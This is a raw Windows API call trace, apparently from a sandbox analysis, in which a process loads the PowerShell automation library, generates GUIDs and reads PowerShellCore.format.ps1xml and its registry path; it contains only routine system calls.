	[0592.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.058] VirtualQuery (in: lpAddress=0xabbb0, lpBuffer=0xaca70, dwLength=0x30 | out: lpBuffer=0xaca70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0592.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.060] VirtualQuery (in: lpAddress=0xabbb0, lpBuffer=0xaca70, dwLength=0x30 | out: lpBuffer=0xaca70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0592.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0592.062] VirtualQuery (in: lpAddress=0xab2a0, lpBuffer=0xac160, dwLength=0x30 | out: lpBuffer=0xac160*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0592.063] VirtualQuery (in: lpAddress=0xab330, lpBuffer=0xac1f0, dwLength=0x30 | out: lpBuffer=0xac1f0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0592.064] VirtualQuery (in: lpAddress=0xaba10, lpBuffer=0xac8d0, dwLength=0x30 | out: lpBuffer=0xac8d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0592.066] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x6581a853, Data2=0xd577, Data3=0x4567, Data4=([0]=0x8a, [1]=0x2f, [2]=0xb7, [3]=0x39, [4]=0x55, [5]=0xce, [6]=0x5a, [7]=0x58))) returned 0x0
	[0592.067] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x86d66510, Data2=0x26f5, Data3=0x4dfe, Data4=([0]=0x9d, [1]=0xdb, [2]=0xb0, [3]=0xa4, [4]=0x97, [5]=0x59, [6]=0x35, [7]=0x0))) returned 0x0
	[0592.067] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x4a9b50e5, Data2=0x71e4, Data3=0x4c1d, Data4=([0]=0xa4, [1]=0x1, [2]=0xe0, [3]=0x9d, [4]=0x76, [5]=0xc2, [6]=0x43, [7]=0x6b))) returned 0x0
	[0592.067] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x33d3e7a2, Data2=0x1255, Data3=0x4f12, Data4=([0]=0xb9, [1]=0xd3, [2]=0xae, [3]=0xbe, [4]=0x73, [5]=0xf7, [6]=0x69, [7]=0x37))) returned 0x0
	[0592.067] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8dc8aabc, Data2=0xb697, Data3=0x40d9, Data4=([0]=0xac, [1]=0x97, [2]=0xaf, [3]=0xab, [4]=0x26, [5]=0xa6, [6]=0xeb, [7]=0x36))) returned 0x0
	[0592.068] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x6535cb9a, Data2=0x125, Data3=0x4355, Data4=([0]=0x8d, [1]=0xc5, [2]=0x4d, [3]=0x57, [4]=0x17, [5]=0xf4, [6]=0x7, [7]=0xc6))) returned 0x0
	[0592.068] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x217f0fcb, Data2=0x1c2d, Data3=0x4aac, Data4=([0]=0x97, [1]=0xaa, [2]=0x93, [3]=0x66, [4]=0x2e, [5]=0x29, [6]=0xff, [7]=0x2e))) returned 0x0
	[0592.068] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xcd7f18e5, Data2=0xe972, Data3=0x46f9, Data4=([0]=0xbd, [1]=0x6f, [2]=0xfd, [3]=0x5d, [4]=0x9b, [5]=0xc3, [6]=0x5a, [7]=0x1b))) returned 0x0
	[0592.068] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc33e3bc3, Data2=0x95a6, Data3=0x47a9, Data4=([0]=0xa4, [1]=0x27, [2]=0xbd, [3]=0x4c, [4]=0xc1, [5]=0xa, [6]=0xdc, [7]=0xe7))) returned 0x0
	[0592.069] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x129771d5, Data2=0x38df, Data3=0x456a, Data4=([0]=0xa6, [1]=0x23, [2]=0xa1, [3]=0x10, [4]=0x14, [5]=0x95, [6]=0xb3, [7]=0xfe))) returned 0x0
	[0592.071] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc77e8d80, Data2=0x44df, Data3=0x4b7e, Data4=([0]=0x9f, [1]=0x14, [2]=0x5e, [3]=0x46, [4]=0xe5, [5]=0x80, [6]=0xc7, [7]=0xbb))) returned 0x0
	[0592.072] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x83b12f6b, Data2=0x2f7d, Data3=0x44b4, Data4=([0]=0xaf, [1]=0xe, [2]=0xe6, [3]=0x7d, [4]=0x56, [5]=0x67, [6]=0xdb, [7]=0x1b))) returned 0x0
	[0592.072] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x176495a3, Data2=0xc750, Data3=0x422e, Data4=([0]=0x86, [1]=0xb2, [2]=0x28, [3]=0xbe, [4]=0x7d, [5]=0x28, [6]=0x68, [7]=0xea))) returned 0x0
	[0592.072] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7cd89e37, Data2=0xd46a, Data3=0x4996, Data4=([0]=0x96, [1]=0x9a, [2]=0x52, [3]=0x6c, [4]=0x2b, [5]=0xec, [6]=0x98, [7]=0xd))) returned 0x0
	[0592.072] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x619fb483, Data2=0x59cf, Data3=0x49a7, Data4=([0]=0xbb, [1]=0xa0, [2]=0xb8, [3]=0x4b, [4]=0xe, [5]=0xf5, [6]=0x72, [7]=0xd2))) returned 0x0
	[0592.073] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x9beb12a, Data2=0xe0ca, Data3=0x4b0b, Data4=([0]=0xa7, [1]=0xe1, [2]=0x5d, [3]=0x16, [4]=0xee, [5]=0x4e, [6]=0xa1, [7]=0x86))) returned 0x0
	[0592.073] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x6d222b16, Data2=0xe57, Data3=0x4027, Data4=([0]=0xbd, [1]=0x89, [2]=0xd7, [3]=0xe2, [4]=0xa2, [5]=0x1b, [6]=0xcc, [7]=0xde))) returned 0x0
	[0592.073] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x72c3a75f, Data2=0x81b9, Data3=0x47ed, Data4=([0]=0x82, [1]=0x5, [2]=0x6a, [3]=0x1d, [4]=0x24, [5]=0x78, [6]=0x6c, [7]=0xf3))) returned 0x0
	[0592.073] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xeebf61d9, Data2=0x9b6, Data3=0x439b, Data4=([0]=0xb4, [1]=0xdf, [2]=0xb7, [3]=0x37, [4]=0x5b, [5]=0x5a, [6]=0xe0, [7]=0x69))) returned 0x0
	[0592.073] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0592.074] GetFileType (hFile=0x2e4) returned 0x1
	[0592.074] SetErrorMode (uMode=0x1) returned 0x1
	[0592.074] GetFileType (hFile=0x2e4) returned 0x1
	[0592.074] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.076] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.077] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.077] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.077] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.077] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.077] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.078] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.078] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.080] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.080] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.082] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.082] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.082] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.083] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.083] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.083] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.088] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.088] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.090] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.090] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0592.090] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0xe67, lpOverlapped=0x0) returned 1
	[0592.091] ReadFile (in: hFile=0x2e4, lpBuffer=0x34c99ff, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34c99ff*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0592.091] ReadFile (in: hFile=0x2e4, lpBuffer=0x34ca430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xacfd8, lpOverlapped=0x0 | out: lpBuffer=0x34ca430*, lpNumberOfBytesRead=0xacfd8*=0x0, lpOverlapped=0x0) returned 1
	[0592.091] CloseHandle (hObject=0x2e4) returned 1
	[0592.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0592.091] SetErrorMode (uMode=0x1) returned 0x1
	[0592.091] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xacf80 | out: lpFileInformation=0xacf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0592.091] SetErrorMode (uMode=0x1) returned 0x1
	[0592.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0592.092] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad068 | out: phkResult=0xad068*=0x2e4) returned 0x0
	[0592.092] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfec, lpData=0x0, lpcbData=0xacfe8*=0x0 | out: lpType=0xacfec*=0x1, lpData=0x0, lpcbData=0xacfe8*=0x56) returned 0x0
	[0592.092] CoTaskMemAlloc (cb=0x5a) returned 0x216490
	[0592.092] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xacfbc, lpData=0x216490, lpcbData=0xacfb8*=0x56 | out: lpType=0xacfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xacfb8*=0x56) returned 0x0
	[0592.092] CoTaskMemFree (pv=0x216490) 
	[0592.092] RegCloseKey (hKey=0x2e4) returned 0x0
	[0592.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0592.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0593.184] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x342f8906, Data2=0xc10d, Data3=0x416a, Data4=([0]=0xb7, [1]=0xa, [2]=0xe0, [3]=0xdb, [4]=0xd8, [5]=0xd5, [6]=0xa2, [7]=0x9))) returned 0x0
	[0593.184] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x102f16e4, Data2=0xcc26, Data3=0x4063, Data4=([0]=0xa3, [1]=0xac, [2]=0x7d, [3]=0x77, [4]=0x7c, [5]=0x4a, [6]=0x95, [7]=0x8c))) returned 0x0
	[0593.184] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xe2ceb85e, Data2=0x8276, Data3=0x4b55, Data4=([0]=0x81, [1]=0x4b, [2]=0x13, [3]=0xe2, [4]=0x45, [5]=0x8, [6]=0xd3, [7]=0x43))) returned 0x0
	[0593.185] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xbe599f42, Data2=0x5e2f, Data3=0x4ae5, Data4=([0]=0xb5, [1]=0x82, [2]=0x57, [3]=0x26, [4]=0x44, [5]=0xaf, [6]=0xd9, [7]=0x57))) returned 0x0
	[0593.186] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x8ea973a7, Data2=0x6110, Data3=0x45b5, Data4=([0]=0xab, [1]=0xcf, [2]=0xc5, [3]=0xe9, [4]=0x3, [5]=0x68, [6]=0xe3, [7]=0x3))) returned 0x0
	[0593.186] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x60de996a, Data2=0xff6b, Data3=0x4b29, Data4=([0]=0x9c, [1]=0xbe, [2]=0x68, [3]=0x6b, [4]=0x83, [5]=0xd0, [6]=0x80, [7]=0x1c))) returned 0x0
	[0593.186] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x3cfd9a6, Data2=0x6783, Data3=0x4e99, Data4=([0]=0x88, [1]=0x53, [2]=0x8d, [3]=0x74, [4]=0x34, [5]=0x77, [6]=0xc4, [7]=0x8a))) returned 0x0
	[0593.187] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x6b52a63e, Data2=0x3123, Data3=0x48ac, Data4=([0]=0x8c, [1]=0xbb, [2]=0x1d, [3]=0x98, [4]=0x34, [5]=0x33, [6]=0xee, [7]=0x9d))) returned 0x0
	[0593.187] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x2338f524, Data2=0x7601, Data3=0x46e5, Data4=([0]=0x9a, [1]=0x6c, [2]=0x94, [3]=0xec, [4]=0x4e, [5]=0xfc, [6]=0xf0, [7]=0xc2))) returned 0x0
	[0593.187] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xe45e0736, Data2=0xc03a, Data3=0x4f6c, Data4=([0]=0xb1, [1]=0x90, [2]=0x18, [3]=0xe, [4]=0xf4, [5]=0x3d, [6]=0xe2, [7]=0x23))) returned 0x0
	[0593.188] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x54cd451a, Data2=0xed5e, Data3=0x4270, Data4=([0]=0xa8, [1]=0x54, [2]=0xa0, [3]=0x58, [4]=0xcf, [5]=0x21, [6]=0xe7, [7]=0x24))) returned 0x0
	[0593.188] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x378b8b27, Data2=0x76c5, Data3=0x4a2c, Data4=([0]=0xbf, [1]=0x9d, [2]=0xd0, [3]=0x18, [4]=0xd8, [5]=0x1, [6]=0x49, [7]=0x78))) returned 0x0
	[0593.188] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xeaeeec0a, Data2=0x240d, Data3=0x475d, Data4=([0]=0xba, [1]=0xf6, [2]=0x1c, [3]=0x56, [4]=0x3, [5]=0xa1, [6]=0xd4, [7]=0xca))) returned 0x0
	[0593.188] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x45f45c0b, Data2=0x83f9, Data3=0x41e5, Data4=([0]=0x93, [1]=0x7, [2]=0xbb, [3]=0xb1, [4]=0xce, [5]=0xd2, [6]=0x41, [7]=0x8))) returned 0x0
	[0593.189] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xf6c0a59b, Data2=0x3120, Data3=0x4994, Data4=([0]=0xab, [1]=0x94, [2]=0x41, [3]=0x6a, [4]=0x74, [5]=0x7d, [6]=0x7c, [7]=0x8))) returned 0x0
	[0593.189] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x58562464, Data2=0xddaa, Data3=0x489f, Data4=([0]=0x8e, [1]=0xa0, [2]=0xa5, [3]=0x6d, [4]=0x22, [5]=0x93, [6]=0x6e, [7]=0xbc))) returned 0x0
	[0593.189] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x36ba13fc, Data2=0x7572, Data3=0x442c, Data4=([0]=0x8b, [1]=0xde, [2]=0xc6, [3]=0x3d, [4]=0xbf, [5]=0xf0, [6]=0xb, [7]=0x41))) returned 0x0
	[0593.189] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xeda3be6e, Data2=0x140b, Data3=0x476d, Data4=([0]=0xac, [1]=0x9d, [2]=0x3e, [3]=0xa6, [4]=0x14, [5]=0x4, [6]=0xa2, [7]=0x50))) returned 0x0
	[0593.190] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xe50ef8b4, Data2=0xc7c9, Data3=0x4c60, Data4=([0]=0xad, [1]=0x49, [2]=0xb, [3]=0xeb, [4]=0x41, [5]=0x4e, [6]=0xa2, [7]=0xd5))) returned 0x0
	[0593.191] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x5b0fa1db, Data2=0xd02, Data3=0x40bc, Data4=([0]=0xb2, [1]=0xf9, [2]=0x2b, [3]=0x9, [4]=0x38, [5]=0xbc, [6]=0x18, [7]=0x13))) returned 0x0
	[0593.191] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x418a06a8, Data2=0xae79, Data3=0x479a, Data4=([0]=0x9d, [1]=0xf8, [2]=0x33, [3]=0x2e, [4]=0x73, [5]=0x43, [6]=0x18, [7]=0xaa))) returned 0x0
	[0593.192] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc24ade72, Data2=0x2771, Data3=0x422d, Data4=([0]=0xaf, [1]=0xc1, [2]=0x6d, [3]=0x6d, [4]=0xe9, [5]=0x93, [6]=0x27, [7]=0xdb))) returned 0x0
	[0593.192] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xc58418f9, Data2=0x20c5, Data3=0x4d23, Data4=([0]=0xb4, [1]=0xb3, [2]=0x3, [3]=0x7b, [4]=0x24, [5]=0xff, [6]=0x3a, [7]=0xfe))) returned 0x0
	[0593.193] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0xb18cb7fd, Data2=0xfae3, Data3=0x403d, Data4=([0]=0x8f, [1]=0xd5, [2]=0x4a, [3]=0xab, [4]=0x84, [5]=0x87, [6]=0xb4, [7]=0x78))) returned 0x0
	[0593.193] CoCreateGuid (in: pguid=0xad290 | out: pguid=0xad290*(Data1=0x7a00ec7e, Data2=0x347, Data3=0x4dfc, Data4=([0]=0x8c, [1]=0x6c, [2]=0x9d, [3]=0xbc, [4]=0x94, [5]=0x4c, [6]=0xd0, [7]=0x63))) returned 0x0
